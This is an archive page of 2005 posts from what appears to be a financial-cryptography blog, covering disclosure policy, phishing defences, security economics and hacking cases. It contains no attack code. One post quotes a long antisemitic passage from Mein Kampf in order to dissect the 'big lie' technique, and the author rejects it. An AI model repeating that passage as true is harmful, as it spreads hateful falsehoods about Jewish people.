    Posted by iang at 06:35 AM | Comments (1) | TrackBack

    March 04, 2005

    NSA gets data mined - not the right crowd to steal a payment system from

    I'm jacking into net in some random office in downtown Vienna, and I'm introduced to the payment-system-in-a-jar. Paper and tokens and IOUs thrown in a big vase serves to manage coordination on an office wide scale of coffee, beer and juice. For my talk on community currencies I thought this would make a great example of a payment system on a local basis, so I lifted the entire thing, and carried the 40cm high jar, money, tokens, and paper included to the presentation.

    This payment system (as I presented) can be stolen. It can be broken. Nice good Internet ones don't have that problem. It was a nice example, it worked and my audience enjoyed the huge jar of purloined coffee money. But as I walked back to the office I wondered whether they'd mind me purloining their payment system.

    I needn't have worried. There was a party in progress, the local technical community was in a happy mood. As I pulled the huge jar out of my laptop bag, luckily unbroken, there were smiles and laughter, and I had to explain what I wanted it for.

    And then, as I was explaining, I detected a complete lack of interest... with austrian lingo and one word sneaking through repeatedly: NSA. After some confusion, I found out that I was at the post-success party of the group that had just data mined the NSA.

    How this happened was gathered in scattered conversations slipped between explanations of payment systems and crypto cert systems. People had signed up for a semi-secret mailing list, and when the archives were put online, they'd been downloaded. Now they're up online in some fashion, and there is discussion on what to do next. The next phases were explained ... but in some sense this was subject to change, so I'll skip that part.

    It looks like the NSA made a few mistakes in migration of internal forums to external availability. That's not a bad thing; but they left a lot of internal stuff in the archives. Also, it looks to me like the stories that are being discussed are really a bad use of secrecy - the sort of political manouvering that was discovered on the lists should not have been secret, but subject to public review. It is after all the money of the taxpayer that is being abused in this debate.

    The one story I did hear was a bureaucratic fight among the FBI, NSA and the Brits over who gets to set the biometrics standard. According to the mail list, the FBI is based on fingerprints so they want that. The NSA loves voice recognition, so that's their baby. But the Brits are all hot on iris recognition and they have the world wide patent.

    Good one guys - this is the sort of debate that really needs to be conducted in the open, not under secrecy. We follow with interest, and now, I must go use the local payment system again to mine some more beers.

    Posted by iang at 08:01 PM | Comments (1) | TrackBack

    February 24, 2005

    Microsoft's negative rep leads to startling new security strategy

    Triage is one thing, security is another. Last week's ground-shifting news was widely ignored in the press. Scanning a bunch of links, the closest I found to any acknowledgement of what Microsoft announced is this:

    In announcing the plan, Gates acknowledged something that many outside the company had been arguing for some time--that the browser itself has become a security risk. "Browsing is definitely a point of vulnerability," Gates said.

    Yet no discussion on what that actually meant. Still, to his sole credit, author Steven Musil admitted he didn't follow what Microsoft were up to. The rest of media speculated on compatibility, Firefox as a competitor and Microsoft's pay-me-don't-pay-me plans for anti-virus services, which I guess is easier to understand as there are competitors who can explain how they're not scared.

    So what does this mean? Microsoft has zero, zip, nada credibility in security.

    ...earlier this week the chairman of the World's Most Important Software Company looked an auditorium full of IT security professionals in the eye and solemnly assured them that "security is the most important thing we're doing."

    And this time he really means it.

    That, of course, is the problem: IT pros have heard this from Bill Gates and Microsoft many times before ...

    Whatever they say is not only discounted, it's even reversed in the minds of the press. Even when they get one right, it is assumed there must have been another reason! The above article goes on to say:

    Indeed, it's no accident that Microsoft is mounting another security PR blitz now, for the company is trying to reverse the steady loss of IE's browser market share to Mozilla's Firefox 1.0.

    Microsoft is now the proud owner of a negative reputation in security,

    Which leads to the following strategy: actions not words. Every word said from now until the problem is solved will just generate wheel spinning for no productivity, at a minimum (and not withstanding Gartner's need to sell those same words on). The only way that Microsoft can change their reputation for insecurity is to actually change their product to be secure. And then be patient.

    Microsoft should shut up and and do some security. Which isn't entirely impossible. If it is a browser v. browser question, it is not as if the competition has an insurmountable lead in security. Yes, Firefox has a reputation for security, but showing that objectively is difficult: their brand is indistinguishable from "hasn't got a large enough market share to be worth attacking as yet."

    Some agree:

    "This is a work in progress," Wilcox says. "The best thing for Microsoft to do is simply not talk about what it's going to do with the browser."

    Posted by iang at 11:08 AM | Comments (2) | TrackBack

    February 19, 2005

    IEEE's Economics of Information Security

    IEEE Security & Privacy magazine has a special on _Economics of Information Security_ this month. Best bet is to simple read the editor's intro.


    There are two on economimcs of disclosure, a theme touched upon recently:

  • Eric Rescorla's article "Is Finding Security Holes a Good Idea?" argues that because large modern software products such as Windows contain many security bugs, removing an individual bug makes little difference to the likelihood that an attacker will find exploits later in a product's life....
  • Ashish Arora and Rahul Telang argue for openness in "Economics of Software Vulnerability Disclosure." Their thesis is that software vulnerability disclosure policies should, in some cases, be more aggressive to push vendors into investing more in patch management.

    Two I've selected for later reading are:

  • In "Privacy and Rationality in Individual Decision Making," Ales­sandro Acquisti and Jens Grossklags use consumer psychology tools to investigate why users' stated privacy preferences differ from their behaviors.
  • In "Toward Econometric Models of the Security Risk from Remote Attacks," Stuart Schechter discusses the problems of trying to model network attacks in the same way that economists interested in crime build economic models of housebreaking. Many of the variables concerning computer or system security risk are hard to pin down,and change rapidly. For example, an analysis of attackers' incentives and costs comes up against the difficulty of assessing products' security strengths. A market for security vulnerability information might bring some clarity here.

    This is because they speak to a current theme - how to model information in attacks.

    Posted by iang at 04:07 PM | Comments (0) | TrackBack
  • February 15, 2005

    Plans for Scams

    Gervase Markham has written "a plan for scams," a series of steps for different module owners to start defending. First up, the browser, and the list will be fairly agreeable to FCers: Make everything SSL, create a history of access by SSL, notify when on a new site! I like the addition of a heuristics bar (note that Thunderbird already does this).

    Meanwhile, Mozilla Foundation has decided to pull IDNs - the international domain names that were victimised by the Shmoo exploit. How they reached this decision wasn't clear, as it was taken on insider's lists, and minutes aren't released (I was informed). But Gervase announced the decision on his blog and the security group, and the responses ran hot.

    I don't care about IDNs - that's just me - but apparently some do. Axel points to Paul Hoffman, an author of IDN, who pointed out how he had IDN spoofing solutions with balance. Like him, I'm more interested in the process, and I'm also thinking of the big security risks to come and also the meta-risks. IDN is a storm in a teacup, as it is no real risk beyond what we already have (and no, the digits 0,1 in domains have not been turned off).

    Referring this back to Frank Hecker's essay on the foundation of a disclosure policy does not help, because the disclosure was already done in this case. But at the end he talks about how disclosure arguments fell into three classes:

  • Literacy: “What are the words?”
  • Numeracy: “What are the numbers?”
  • Ecolacy: “And then what?”
  • "To that end [Frank suggests] to those studying the “economics of disclosure” that we also have to study the “politics of disclosure” and the “ecology of disclosure” as well."

    Food for thought! On a final note, a new development has occurred in certs: a CA in Europe has issued certs with the critical bit set. What this means is that without the code (nominally) to deal with the cert, it is meant to be rejected. And Mozilla's crypto module follows the letter of the RFC in this.

    IE and Opera do not it seems (see #17 in bugzilla), and I'd have to say, they have good arguments for rejecting the RFC and not the cert. Too long to go into tonight, but think of the crit ("critical bit") as an option on a future attack. Also, think of the game play that can go on. We shall see, and coincidentally, this leads straight back into phishing because it is asking the browser to ... display stuff about the cert to the user!

    What stuff? In this case, the value of the liability in Euros. Now, you can't get more FC than that - it drags in about 6 layers of our stack, which leaves me with a real problem allocating a category to this post!

    Posted by iang at 10:05 PM | Comments (0) | TrackBack

    Disclosure - "no stupid embargos" says Linus

    The Linux community just set up a new way to report security bugs. In the debate, it transpires that Linus Torvalds laid down a firm position of "no delay on fix disclosures." Having had a look at some security systems lately, I'm inclined to agree. It may be that delays make sense to let vendors catch up. That's the reason most quoted, and it makes entire logical sense. But, that's not what happens.

    The process then gets hijacked for other agendas, and security gets obscured. Thinking about it, I'm now viewing the notion of security being discussed behind closed doors with some suspicion; it's just not clear how security by obscure committees divides their time between "ignoring the squeeky wheels" and "create space to fix the bugs." I've sent messages on important security issues to several closed security groups in the last 6 months, and universally they've been ignored.

    So, zero days disclosure is my current benchmark. Don't like it? Use a closed product. Especially when considered that 90% of the actual implementations out there never get patched in any useful time anyway...

    Posted by iang at 11:01 AM | Comments (1) | TrackBack

    The Weakest Link

    Bruce Schneier reports on the principle of the weakest link:

    To paraphrase Adi, "[security] is bypassed not attacked."

    Posted by iang at 10:24 AM | Comments (2) | TrackBack

    February 14, 2005

    Full disclosure: for and against

    How to address Internet security in an open source world is a simmering topic. Frank Hecker has documented his view of the Mozilla Full Disclosure debate that led to their current security policy. He makes the point that the parties are different: with open source there are many vendors, which complicates the notion of disclosure. Further, the bug fixers can be anyone, following the many eyeballs theory. This then devolves into the creation of a search for a policy where anyone can be an insider, Mozilla's current policy is that result; and we are very fortunate to have the story recorded.

    Meanwhile, Adam points at an attempt by Microsoft to slow down open disclosure of exploits. In this case they are attacking the release of source code to exploit, Adam responds that this is perhaps more in the interests of defenders than attackers. My view: it looks less dramatic if treated as gameplay by Microsoft. The short term end goal is to get the patches out there, and Microsoft have succumbed to the easy blame opportunity to create a sense of urgency.

    (Thread: Towards an Economic Analysis of Disclosure and papers listed there, additional costs, and consumer's adjusting risk profile.)

    Posted by iang at 06:46 AM | Comments (0) | TrackBack

    February 11, 2005

    Top 18 Security Papers - add "the 3 laws of security"

    Adam found a "top 18 security papers" list. My suggestion is to add Adi Shamir's recent Turing Award Lecture to the list. I recorded the important slides here, and at least once a week I find myself coping one or other of the components from it for posting somewhere on the net. And I'm writing an entire paper on just one line...

    Adam reports the list is already up to 28, perhaps what the list keeper needs is some sort of market determined mechanism. Perhaps every security blog could trackback to their top 3 selections,and thus create a voting circle? (Hmmm, scanning the list, I see some ones that I wouldn't vote for, so how about some negative votes as well?)

    To be fair, I'm not sure I've read any of them, which either augers badly for me or badly for the list :-) Which brings up another point. If someone is going to promote some paper or other, far*&%$ake put the URL of the HTML up there... If it ain't in HTML it can't reach an audience and it can't then be in any top 18. So there! That's it from me this week.

    Posted by iang at 03:14 PM | Comments (3) | TrackBack

    January 27, 2005

    Unintended Consequences and the Case of the $100 Superbill

    Axel points to a rather good article on Unintended Consequences with lots of good examples for the security thinker. If there is one cause that one had to put ones finger on, it is this: the attacker is smart, and can be expected to think about how to attack your system. Once you think like an attacker, you have a chance. If not, forget it.

    Notwithstanding that minor ommission, here's the rather nice FC example, that of the mysterious $100 superbills.

    Back in the 1970s, long before the revolution that would eventually topple him from power, the Shah of Iran was one of America's best friends (he was a dictator who brutally repressed his people, but he was anti-communist, and that made him OK in our book). Wanting to help out a good friend, the United States government agreed to sell Iran the very same intaglio presses used to print American currency so that the Shah could print his own high quality money for his country. Soon enough, the Shah was the proud owner of some of the best money printing machines in the world, and beautiful Iranian Rials proceeded to flow off the presses.
    All things must come to an end, and the Shah was forced to flee Iran in 1979 when the Ayatollah Khomeini's rebellion brought theocratic rule to Iran. Everyone reading this undoubtedly knows the terrible events that followed: students took American embassy workers hostage for over a year as Iran declared America to be the "Great Satan," while evidence of US complicity in the Shah's oppression of his people became obvious, leading to a break in relations between the two countries that continues to worsen to this day.
    During the early 90s, counterfeit $100 bills began to flood the Mideast, eventually spreading around the world. Known as "superbills" or "superdollars" by the US Treasury due to the astounding quality of the forgeries, these $100 bills became a tremendous headache not only for the US and its economy, but also for people all over the world that depend on the surety of American money. Several culprits have been suggested as responsible for the superbills, including North Korea and Syria, but many observers think the real culprit is the most obvious suspect: an Iranian government deeply hostile to the United States ... and even worse, an Iranian government possessing the very same printing presses used to create American money.
    If you've ever wondered just why American currency was redesigned in the 1990s, now you know. In the 1970s, the US rewarded an ally with a special machine; in the 1990s, the US had to change its money because that ally was no longer an ally, and that special machine was now a weapon used to attack the US's money supply, where it really hurts. As an example of the law of unintended consequences, it's powerful, and it illustrates one of the main results of that law: that those unintended consequences can really bite back when you least expect them.

    Read the rest... Unintended Consequences.

    Posted by iang at 09:11 AM | Comments (2) | TrackBack

    The Green Shoots of Opportunistic Cryptography

    In a New Scientist article, mainstream popular press is starting to take notice that the big Wi-Fi standards have awful crypto. But there are some signs that the remedy is being pondered - I'll go out on a limb and predict that within a year, opportunistic cryptography will be all the rage. (links: 1, 2, 3,4 5)

    (Quick explanation - opportunistic cryptography is where you generate what you need to talk to the other party on the fly, and don't accept any assumptions that it isn't good enough. That is, you take on a small risk of a theoretical attack up front, in order to reach cryptographic security quickly and cheaply. The alternate, no-risk cryptography, has failed as a model because its expense means people don't deploy it. Hence, it may be no-risk, but it also doesn't deliver security.)

    Here's what has been seen in the article:

    Security experts say that the solution lies in educating people about the risks involved in going wireless, and making the software to protect them easier to use. "Blaming the consumer is wrong. Computers are too complex for the average person to secure. It's the fault of the network, the operating system and the software vendors," says California-based cryptographer Bruce Schneier in the US. "Products need to be secure out of the box," he says.

    Skipping the contradiction between "educating people" and "blaming the consumer", it is encouraging to see security people pushing for "secure out of the box." Keys should be generated opportunistically and on install, the SSH model (an SSH blog?). If more is wanted, then the expert can arrange that, but there is little point in asking an average user to go through that process. They won't.

    Schneier is pessimistic. "When convenience and features are in opposition to security, security generally loses. As wireless networks become more common, security will get worse."

    Schneier is unduly pessimistic. The mistake in the above logic is to consider the opposition between convenience and security as an invioble assumption. The devil is in those assumptions, and as Modadugu and Rescorla said recently:

    "Considering the complexity of modern security protocols and the current state of proof techniques, it is rarely possible to completely prove the security of a protocol without making at least some unrealistic assumptions about the attack model."

    (Apologies, but it's buried in a PDF. Post.) That's a green shoot, right there! Adi Shamir says that absolutely secure systems do not exist, so as soon as we get over that false assumption that we can arrange things perfectly, we can start to work out what benefits us most, in an imperfect world.

    There's no reason why security and convenience can't walk hand in hand. In the 90s, security was miscast as needing to be perfect regardless of convenience. This simply resulted in lost sales and thus much less security. Better to think of security as what we can offer in alignment with convenience - how much security can we deliver for our convenience dollar? A lot, as it turns out.

    Posted by iang at 07:02 AM | Comments (15) | TrackBack

    January 25, 2005

    Do security breaches drop the share value?

    According to those that think WiKID thoughts, yes. Quoting a paper by Campbell et al, there can be measured a 5% drop in stock price when confidentiality is breached. Adam demurs, thinking the market is unconcerned about the breaches of confidentiality, rather, is concerned about a) loss of customers or b) lawsuits.

    I demur over both! I don't think the market cares about any of those things.

    In this case, I think the market is responding to the unknown. In other words, fear. It has long been observed that once a cost is understood, it becomes factored in, and I guess that's what is happening with DDOS and defacements/viruses/worms. But large scale breaches of confidentiality are a new thing. Previously buried, they are now surfaced, and are new and scary to the market.

    And the California law makes them even scarier, forcing the companies into the unknown of future litigation. But, I think once these attacks have run their course in the public mind, they will stop causing any market reaction. That isn't to say that the attacks stop, or the breaches in confidentiality stop, but the market will be so used to them that they will be ignored.

    Otherwise I have a problem with a 5% drop in value. How is it that confidentiality is worth 5% of a company? If that were the case, companies like DigiCash and Zero-Knowledge would have scored big time, but we know they didn't. Confidentiality just isn't worth that much, ITMO (in the market's opinion).

    The full details:

    "The economic cost of publicly announced information security breaches: empirical evidence from the stock market," Katherine Campbell, Lawrence A. Gordon, Martin P. Loeb and Lei Zhou Accounting and Information Assurance, Robert H. Smith School of Business, University of Maryland, 2003.

    Abstract This study examines the economic effect of information security breaches reported in newspapers or publicly traded US corporations. We find limited evidence of an overall negative stock market reaction to public announcements of information security breaches. However, further investigation reveals that the nature of the breach affects this result. We find a highly significant negative market reaction for information security breaches involving unauthorized access to confidential data, but no significant reaction when the breach does not involve confidential information. Thus, stock market participants appear to discriminate across types of breaches when assessing their economic impact on affected firms. These findings are consistent with the argument that the economic consequences of information security breaches vary according to the nature of the underlying assets affected by the breach.

    Also over on Ross Anderson's Econ & Security page there are these:

    Two papers, "Economic Consequences of Sharing Security Information" (by Esther Gal-Or and and Anindya Ghose) and "An Economics Perspective on the Sharing of Information Related to Security Breaches" (by Larry Gordon), analyse the incentives that firms have to share information on security breaches within the context of the ISACs set up recently by the US government. Theoretical tools developed to model trade associations and research joint ventures can be applied to work out optimal membership fees and other incentives. There are interesting results on the type of firms that benefit, and questions as to whether the associations act as social planners or joint profit maximisers.

    Which leads to "How Much Security is Enough to Stop a Thief?," Stuart Schechter and Michael Smith, FC03 .

    Posted by iang at 02:00 PM | Comments (0) | TrackBack

    Thunderbird Gains Phishing Detection (Too)

    Through a long chain of blogs (evidence that users care about phishing at least: gemal.dk MozIne, LWN, Addict) comes news that Thunderbird is also to have click-thru protection. The hero of the day is one Scott MacGregor. Easiest just to read his bug report and gfx:

    Thunderbird phishing warnings

    Get a phishing detector going for Thunderbird. I'm sure it can be improved quite a bit but this starts to catch some of the more obvious scams.

    When the user clicks on a URL that we think is a phishing URL, he now gets prompted before we open it. Handles two cases so far. Hopefully we can add more as we figure out how. The host name of the actual URL is an IP address. The link text is a URL whose host name does not match the host name of the actual URL.. I added support for a silentMode so later on we can hopefully walk an existing message DOM and call into this routine on each link element in the DOM. This would allow us to insert an email scam warning bar in the message window down the road.

    That's good stuff! It is similar to the fix that JPM reported a couple of days ago. Momentum is building to fix the tools, so it we might soon start to see work in browsers - that which is being attacked - to address phishing. So far, Firefox has made a small start with a yellow SSL bar and SSL domain name on the bottom right . More will follow, especially as the fixes outside the browser force phishers towards more "correct" URLs and SSL attacks.

    Posted by iang at 10:11 AM | Comments (3) | TrackBack

    January 21, 2005

    The Big Lie - does it apply to 2005's security problems?

    I've been focussed on a big project that finally came together last night, so am now able to relax a little and post. Adam picked up on this comment on haplass Salman Rushdie still suffering from his maybe-fatwa. Which led to a link on the Big Lie and this definition:

    "All this was inspired by the principle - which is quite true in itself - that in the big lie there is always a certain force of credibility; because the broad masses of a nation are always more easily corrupted in the deeper strata of their emotional nature than consciously or voluntarily; and thus in the primitive simplicity of their minds they more readily fall victims to the big lie than the small lie, since they themselves often tell small lies in little matters but would be ashamed to resort to large-scale falsehoods. It would never come into their heads to fabricate colossal untruths, and they would not believe that others could have the impudence to distort the truth so infamously."

    Today's pop quiz is: Who wrote that?

    I'll let in one little hint, he was one of the great orators of the 20th century. If you are the impatient sort that can't handle a little suspense, you can click on the WikiPedia link to see, but let's analyse his theory first.

    To his big lie. The concept is breathtaking in its arrogance, but it's also difficult to deny. I'm sure you can think of a few in politics, right now, but this is an FC forum, so let's think like that. I can think of two cases where the big lie has occurred.

    The first was in the security of a payment system I worked with back in the 90s. It was totally secure, as everyone agreed. Yet it wasn't, and watching that unravel led to fascinating observations as the organisation had to face up to its deepest secrets being revealed to the world. (In this case, some bright upstart from California had patented the secrets, which should give you enough of a clue...).

    The second big lie was the secure browsing system. SSL in browsers, in other words. It was supposed to be secure, but the security started unravelling a few years back as phishing started to get going. Before that, I'd been poking at it and unwinding some of the assumptions in order to show it wasn't secure. It was a hobby, back then, as what we do in the security world is hone our skills by taking apart someone else's system.

    To little avail. And I now wonder if what I was facing was the big lie? A community of Internet security people had created the belief that it was secure. And this enabled them to ignore any particular challenge to that security. Hence if, by way of example, we pointed out that, say, a breach on any certificate authority would cause all CAs to be breached, this was easily fobbed off onto some area of the intricate web (e.g., CAs are audited, therefore...).

    Now, that area could also easily be shown to be weak as well, but by that time people had lost interest in our arguments. They had done their job, perhaps, or they simply relied on other people to assure them that those other areas were safe. My own view is that when one steps outside the discipline, all subtlety disappears and the truth becomes, well, gospel. (Auditing makes companies safe, right? That's what Sarbanes-Oxley and Basel II and all that is about!)

    Our orator from the past goes on to say:

    "Even though the facts which prove this to be so may be brought clearly to their minds, they will still doubt and waver and will continue to think that there may be some other explanation. For the grossly impudent lie always leaves traces behind it, even after it has been nailed down, a fact which is known to all expert liars in this world and to all who conspire together in the art of lying."

    Now, he conveniently pins the blame on a conspiracy of expert liars, which we'll leave for the moment. But notice how even as the lie "leaves traces behind it" the power of the mind turns to seaching for the explanation that keeps it "true." And so it is with phishing and web browser's security against a spoofed site. Even as phishing reaches and enjoys institutional scope, the basic facts of the matter - it's an attack on the secure browser - are ignored.

    There must be some other explanation! If we were to say that the browser should identify the site, and it doesn't, then that would mean that secure browsing isn't secure, and that can't be right, can it? There must be some other explanation... and all of the associations and cartels and standards organisations and committees are rushing around in ever enlarging circles proposing server software, secure hardware tokens, user education, and bigger fines.

    The big lie is an extraordinarily powerful thing. In closing, I'll post the last part of that extract, which might alert you to the author. Call it clue #2. But keep an open mind as to what he is saying, because I'll challenge you on it!

    "These people know only too well how to use falsehood for the basest purposes. From time immemorial, however, the Jews have known better than any others how falsehood and calumny can be exploited. Is not their very existence founded on one great lie, namely, that they are a religious community, where as in reality they are a race? And what a race! One of the greatest thinkers that mankind has produced has branded the Jews for all time with a statement which is profoundly and exactly true. Schopenhauer called the Jew 'The Great Master of Lies.' Those who do not realize the truth of that statement, or do not wish to believe it, will never be able to lend a hand in helping Truth to prevail."

    Now, we all know that isn't true. Or do we? Just exactly how did our orator create such a fascinating big lie, and how many people do you know that can unravel the above and work out what he did?

    Here's what I think he did. Firstly, he described the big lie. Then, he attributed the big lie to his targeted victims. In that way, he hid the fact that he himself was creating another big lie set squarely against the first one.

    So our hapless citizen has to not only unravel one big lie, but two big lies. Not only that, but the first big lie has probably been around for yonks, and just has to be true, right?

    Offering a defence to Adolf Hitler's inspiration is tough. (Yes, it was he, writing in Mein Kampf, if you haven't already guessed it. WikiPedia.) Two big lies do not a big truth make? Nice, pithy, and will not be understood by our 99% target population. It takes a big lie to defeat a big lie?

    A puzzler to be sure. For now, I'll leave you with the big thought that it's time for a big coffee.

    Posted by iang at 09:45 AM | Comments (8) | TrackBack

    January 15, 2005

    T-mobile cracker also hacks Proportionality with Embarrassment

    All the blogs (1, 2, 3) are buzzing about the T-Mobile cracker. 21 year old Nicolas Jacobsen hacked into the phone company's database and lifted identity information for some 400 customers, and also scarfed up a photos taken by various phone users. He sold these and presumably made some money. He was at it for at least 6 months, and was picked up in an international sweep that netted 28 people.

    No doubt the celebrity photos were embarrassing, but what was cuter was that he also lifted documents from the Secret Service and attempted to sell them on IRC chat rooms!

    One would suppose that he would find himself in hot water. Consider the young guy who tried to steal a few credit cards from a hardware store by parking outside and using his laptop to wirelessly hack in and install a trojan. He didn't succeed in stealing anything, as they caught him beforehand. Even then, the maximum he was looking at was 6 credit card numbers. Clearly, a kid mucking around and hoping to strike lucky, this was no real criminal.

    He got 12 years. That's 2 years for every credit card he failed to steal.

    If proportionality means anything, Jacobsen is never ever going to see sunlight again. So where are we now? Well, the case is being kept secret, and the Secret Service claim they can't talk about it. This is a complete break with tradition, as normally the prosecution will organise a press circus in order to boost their ratings. It's also somewhat at odds with the press release they put out on the other 19 guys they picked up.

    The answer is probably that which "a source" offers: "the Secret Service, the source says, has offered to put the hacker to work, pleading him out to a single felony, then enlisting him to catch other computer criminals in the same manner in which he himself was caught. The source says that Jacobsen, facing the prospect of prison time, is favorably considering the offer."

    Which is fine, except the hardware shop hacker also helped the hardware store to fix up their network and still got 12 years. The way I read this message is that proportionality - the punishment matching the crime - is out the window, and if you are going to hack, make sure you hack the people who will come after you to the point of ridicule.

    Posted by iang at 02:37 PM | Comments (5) | TrackBack

    January 10, 2005

    Security by Obscurity blooper - Cameras caught on Google

    Those of you who shudder over my aggressive adoration of "security by obscurity" will cheer the article in the Register that reveals the latest on-camera bloopers.

    It seems that thousands of webcams (little cameras for PCs) install and open up webservers by default. Now, this is a fine thing to do if you can keep your webserver "hidden" from view. (That's what we mean by security by obscurity!) But recall that google and/or others have been shipping spyware tools that capture secret URLs from chat sessions and email sessions, and then forward them to search engines! Well, it was only a matter of time before someone figured out a way to search google for all those secret cameras ...

    Suddenly, the age old trick of using a secret webserver or URL to distribute a private document no longer works. Whoops. Security by obscurity just flipped that trick on its head.

    But, let's not throw out the baby with the bathwater. Anyone using that trick should have known that they were taking a risk. Now we know the risk is dramatically enhanced by spyware snaffling secret URLs. So, stop doing it. But, while it lasted, it was a good trick, and it saved lots of people lots of costs.

    Oh, for the victims - those companies shipping the webserver camera setups that are unsecure by default - well, you deserve to be embarrassed. And the people spyed upon by the bloggers ... consider the greater good of teaching us how to secure our world as your compensation. And let's hope you weren't doing anything too embarrassing.

    Posted by iang at 09:37 AM | Comments (4) | TrackBack

    January 04, 2005

    Accountants list the tech problems, Security and Sarbanes-Oxley take pole positions

    A tech survey by accountants gives some interesting tips on security. The reason it is credible is because the authors aren't from our industry, so they can be expected to approach this without the normal baggage of some security product to sell. Of course their own is for sale, but that's easy to factor out in this case.

    Security is still the Number One concern that accountants are seeing out there. That makes sense. It accords with everything we've seen about the phishing and identity theft explosions over the last couple of years.

    Second is electronic document management. Why now? This issue has been around for yonks, and businesses have been basically doing the paperless office as and when they could. My guess is that things like Sarbanes-Oxley, Basel II and various lesser well named regulatory attacks on governance have pushed this to the fore. Now, if you haven't got your documents under control (whatever that means) you have a big risk on your hands.

    Third is Data Integration. This echoes what I've seen in finance circles of late; they have gone through a phase of automating everything with every system under the sun. Now, they're faced with tieing them all together. The companies selling product at the moment are those with tools to ease the tying of things together. But so far, the companies are not exactly enticed, with many companies dreading yet another cycle based on the current web services hype.

    Spam has slipped to Fourth in the rankings of the "biggest concerns". The article tries to hint at this as a general easing of the problem, but I'd suggest caution: there are far too many ways in which this can be misinterpreted. For example, the huge increase in security concerns over the last year have probably and simply overshadowed spam to the extent that spam may well have doubled and we'd not have cared. Identity Theft is now on the agenda, and that puts the spam into context. One's a nuisance and the other's a theft. Internet security experts may be bemused, but users and accountants can tell the difference.

    For the rest, read on...


    Information Security Once Again Tops AICPA Tech List

    Jan. 3, 2005 (SmartPros) For the third consecutive year, information
    security is the country's number one technology concern, according to the
    results of the 2005 Top Technologies survey of the American Institute of
    Certified Public Accountants.

    The survey, conducted annually since 1990, seeks to determine the 10 most
    important technology issues for the coming year. There were more than 300
    participants in the 2005 survey, a 30 percent increase over the previous
    year.

    Interestingly, spam technology -- an issue closely associated with
    information security -- apparently has lost some currency. It made its debut
    on the 2004 list at number two. On the new list, it falls to number four.

    "Because our work and personal lives are now inextricably linked to
    information systems, security will always be top of mind," said Roman
    Kepczyk, CPA/CITP, Chair of the AICPA's Information Technology Executive
    Committee. Commenting on spam technology's lower placement on the list, he
    said, "We've seen major improvements to filtering systems, which have
    allowed us to bring spam under greater control. This most likely is the
    reason that spam technology doesn't command the importance it did in the
    previous survey."

    A different issue closely allied with information security -- electronic
    data management, or the paperless office -- moved up to second place. It was
    number three last year.

    There are two debuts on the Top Technologies list: authentication
    technologies and storage technologies. Another issue, learning and training
    competency, reappears at number 10 after an absence of three years.

    The following are the 2005 Top 10 Technologies:

    1.. Information Security: The hardware, software, processes and procedures
    in place to protect an organization's information systems from internal and
    external threats.

    2.. Electronic Document Management (paperless or less-paper office): The
    process of capturing, indexing, storing, retrieving, searching and managing
    documents electronically. Formats include PDF, digital and image store
    database technologies.

    3.. Data Integration: The ability to update one field and have it
    automatically synchronize between multiple databases, such as the
    automatic/seamless transfer of client information between all systems. In
    this instance, only the data flows across systems from platform to platform
    or application to application. Data integration also involves the
    application-neutral exchange of information. For example, the increased use
    of XBRL (eXtensible Business Reporting Language) by companies worldwide
    provides for the seamless exchange and aggregation of financial data to meet
    the needs of different user groups using different applications to read,
    present and analyze data.

    4.. Spam Technology: The use of technology to reduce or eliminate unwanted
    e-mail commonly known as Spam.

    5.. Disaster Recovery: The development, monitoring and updating of the
    process by which organizations plan for continuity of their business in the
    event of a loss of business information resources through theft,
    virus/malware infestation, weather damage, accidents or other malicious
    destruction. Disaster recovery includes business continuation, contingency
    planning and disk recovery technologies and processes.

    6.. Collaboration and Messaging Applications: Applications that allow
    users to communicate electronically, including e-mail, voicemail, universal
    messaging, instant messaging, e-mailed voice messages and digital faxing.
    Examples include a computer conference using the keyboard (a keyboard chat)
    over the Internet between two or more people.

    7.. Wireless Technologies: The transfer of voice or data from one machine
    to another via the airwaves and without physical connectivity. Examples
    include cellular, satellite, infrared, Bluetooth, WiFi, 3G, 2-way paging,
    CDMA, Wireless/WiMax and others.

    8.. Authentication Technologies (new): The hardware, software, processes
    and procedures to protect a person's privacy and identity from internal and
    external threats, including digital identity, privacy and biometric
    authentication.

    9.. Storage Technologies (new): Storage area networks (SAN) include mass
    storage, CD-recordable, DVD, data compression, near field recording,
    electronic document storage and network attached storage (NAS), as well as
    small personal storage devices like USB drives.

    10.. Learning and Training Competency (End Users): The methodology and
    curriculum by which personnel learn to understand and use technology. This
    includes measuring competency, learning plans to increase the knowledge of
    individuals, and hiring and retaining qualified personnel with career
    opportunities that retain the stars.

    Also, each year the AICPA Top Technologies Task Force prepares a "watch
    list" of five emerging technologies [...]

    http://accounting.smartpros.com/x46436.xml

    Posted by iang at 06:59 AM | Comments (1) | TrackBack

    January 03, 2005

    Frank Abagnale at CSI - Know me if you can

    Axel's blog points to a storm in a teacup over at a professional association called the Computer Security Institute. It seems that they invited Frank Abagnale to keynote at their conference. Abagnale, if you recall, is the infamous fraudster portrayed in the movie Catch me if you can.

    csi31st_abagnale_sign16.jpg

    Many of the other speakers kicked up a fuss. It seems they had ethical qualms about speaking at a conference where the 'enemy' was also presenting. Much debate ensued, alleges Alex, about forgiveness, holier than thou attitudes and cashing in on notoriety.

    I have a different perspective, based on Carl von Clausewitz's famous aphorism. He said something to the extent of "Know yourself and you will win half your battles. Know your enemy and you will win 99 battles out of a hundred." Those speakers who complained or withdrew have cast themselves as limited to the first group, the self-knowers, and revealed themselves as reliable only to win every second battle.

    Still, even practitioners of narrow horizons should not be above learning from those who see further. So why is there such a paranoia of only dealing with the honest side in the security industry? This is the never-ending white-hat versus black-hat debate. I think the answer can be found in guildthink.

    People who are truly great at what they do can afford to be magnaminous about the achievements of others, even those they fight. But most are not like that, they are continually trapped in a sort of middle level process-oriented tier, implementing that which the truly great have invented. As such, they are always on the defensive for attacks on their capabilities, because they are unable to deal at the level where they can cope with change and revolution.

    This leads the professional tiers to always be on the lookout for ways to create "us" and "them." Creating a professional association is one way, or a guild, to use the historical term.

    csi31st_abagnale_norris.jpg

    Someone like Frank Abagnale - a truly gifted fraudster - has the ability to make them look like fools. Thus, he scares them. The natural response to this is to search out rational and defensible ways to keep him and his ilk on the outside, in order to protect the delicate balance of trade. For that reason, it is convenient to pretend to be morally and ethically opposed to dealing with those that are convicted. What they are really saying is that his ability to show up the members for what they are - middle ranking professionals - is against their economic interests.

    In essence, all professionals do this, and it should come as no surprise. All associations of professionals spend a lot of their time enhancing the credibility of their members and the dangers of doing business with those outside the association. So much so that you won't find any association - medical, accounting, engineering, or security - that will admit that this is all normal competitive behaviour. (A quick check of the CSI site confirms that they sell training, and they had a cyberterrorism panel. Say no more...)

